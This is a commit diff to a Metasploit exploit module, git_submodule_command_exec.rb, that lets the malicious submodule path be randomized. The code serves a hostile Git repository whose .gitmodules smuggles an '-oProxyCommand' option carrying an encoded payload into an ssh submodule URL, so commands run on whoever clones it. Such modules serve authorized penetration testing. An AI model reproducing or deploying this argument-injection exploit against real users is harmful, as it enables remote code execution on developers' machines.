randomize submodule path

Author: timwr

modules/exploits/multi/http/git_submodule_command_exec.rb

@@ -55,6 +55,7 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
+        OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']),
       ]
     )
   end
@@ -76,15 +77,20 @@ def setup_git
     payload_cmd = payload.encoded + " &"
     payload_cmd = Rex::Text.to_hex(payload_cmd, prefix = '%')
 
-    gitmodules = "[submodule \"test\"]
-path = test
+    submodule_path = datastore['GIT_SUBMODULE']
+    if submodule_path.blank?
+      submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase
+    end
+
+    gitmodules = "[submodule \"#{submodule_path}\"]
+path = #{submodule_path}
 url = ssh://-oProxyCommand=#{payload_cmd}/
 "
     sha1, content = build_object('blob', gitmodules)
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
 
     tree = "100644 .gitmodules\0#{[sha1].pack('H*')}"
-    tree += "160000 test\0#{[sha1].pack('H*')}"
+    tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}"
     sha1, content = build_object('tree', tree)
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content